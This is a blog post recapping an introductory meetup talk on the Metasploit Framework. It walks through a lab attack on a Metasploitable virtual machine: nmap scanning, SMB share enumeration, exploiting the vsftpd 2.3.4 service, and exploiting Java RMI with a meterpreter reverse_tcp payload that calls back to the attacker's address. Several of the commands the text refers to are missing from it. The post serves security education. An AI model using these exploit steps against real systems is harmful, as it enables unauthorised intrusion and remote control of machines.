This post is a quick run down of a talk that I gave at my local information security meetup to introduce the Metasploit Framework to those that have not used it before.
So what is Metasploit?
Metasploit is an exploitation framework with a collection of tools to help develop exploits and use them. It was created in 2003 by H D More.
The Metasploit project was purchased by Rapid7 in 2009.
Originally written in Perl it has now been rewritten in Ruby. It comes in 2 main flavours the open source and pro editions.
While there are many tools in the Metasploit framework, today we will only be using
msfconsole there are 4 main modules.
In this module we can find all sorts of things that don’t really fit into the other modules. However this is where we find the modules that we can use to enumerate the target for vulnerabilities.
In the exploit module, yes you guessed it that is where we find the exploits that use known vulnerabilities to break into a target machine. As of writing this there are over 1500 exploits in Metasploit.
A payload is a bit of code that we can have run on the target. Generally this is a way for us to get shell access.
Post modules let us gather information about the target and its environment once it has been exploited. This enables to collect more intelligence about the target for privilege escalation and finding more targets.
Meterperter is a special payload that gives us higher level access to the target. With this access we can upload/download files, interact with the targets file system and lots more.
We will see an example of its usage a little later on.
With the old saying “Hackers be lazy” we can take a leaf out of their book and install a Kali image with metasploit pre-installed ready to go. This will save a lot of time trying to get the setup just right.
Please make sure that these VM’s aren’t publicly accessible
If you have the ability to take a snapshot with your virtualisation software now is the time to do so.
Before starting metasploit we must initialise the database. To do this type
msfdb init into the terminal window. To start up msfconsole
msfconsole type into your terminal.
first up port scanning, you can use
db_nmap. The only difference between the 2 is that db_nmap saves the output in the metasploit database for you to query later.
db_nmap -T4 -A -v 172.16.1.142
this shows us that there is a truck load of ports open
using the command
services we can query the databse to see what ports are open.
From this list of services we can see that Samba is enabled. Let us enumerate the samba shares.
use auxiliary/scanner/smb/smb_enumshares into msfconsole.
We can see what options this module requires by entering
The targets ip address can be set by entering
set RHOSTS 172.16.1.142 in my case. To find the ip address of your target the easy way is to login to the metasploitable machine
msfadmin:msfadmin and then run
To execute the module enter
Once we have done our recon it is time to break in.
As we can see from the list of services the target is running a ftp daemon, vsftpd 2.3.4 to be exact.
We can do a quick search to see if we have an exploit for that by typing in
Oh nice, there is one to make use of this exploit type in
same as the scanner we can set the targets ip
set RHOST 172.16.1.142
to see what payloads we can use with this exploit enter
to use the payload enter
set PAYLOAD cmd/unix/interact
We can check to see if there are any options to the payload we need to set by entering
to execute the exploit enter
There we have it command execution on the target.
Let us try another exploit
as we know from the
services command there are lots of interesting sevices running. One that caught my eye was the Java RMI Registry service.
I happen to know that this is exploitable. To use the exploit enter
use exploit/multi/misc/java_rmi_server and look at its options.
There are a few more that I need to set this time around as I’m running multiple ip adresses. I need to
set RHOST 172.16.1.142 and set the local interface to listen on
set SRVHOST 172.16.1.138
This time we are going to use the meterperter payload
set PAYLOAD java/meterpeter/reverse_tcp
This payload requires 2 options LHOST is the ip adress the attack machine that the target needs to connect to and LPORT is the port to use.
Again to execute the exploit type in
as you we have successfully exploited the target but how do we interact with it? The exploit has called us back with a meterperter shell and put that into a background session.
To list your sessions enter
to interact with this session enter
sessions -i 1
now we are in the meterperter session. We can interact with the target and even gain shell access.
there is a lot more that can be done with meterperter, please read up on what can be done.
To exit the meterperter session type
Now that we have exploited the system and have a session it is time to gather more intelligence.
We attach the post module to an active session by setting the
as with the auxiliary moudles enter
run to execute
This is as far as we are going today and I’ll leave it up to you what to do next.
Beyond the Framework
If the metasploit framework isn’t enough for you then check out the following:
Metasploit Pro has more power.
Armitage - http://www.fastandeasyhacking.com/ (included in Kali) an open source pointy clicky thing.
Cobalt Strike https://www.cobaltstrike.com/ a pro pointy click thing.
There is some much more to metasploit and if you want to know a little more go and check out these awesome resources: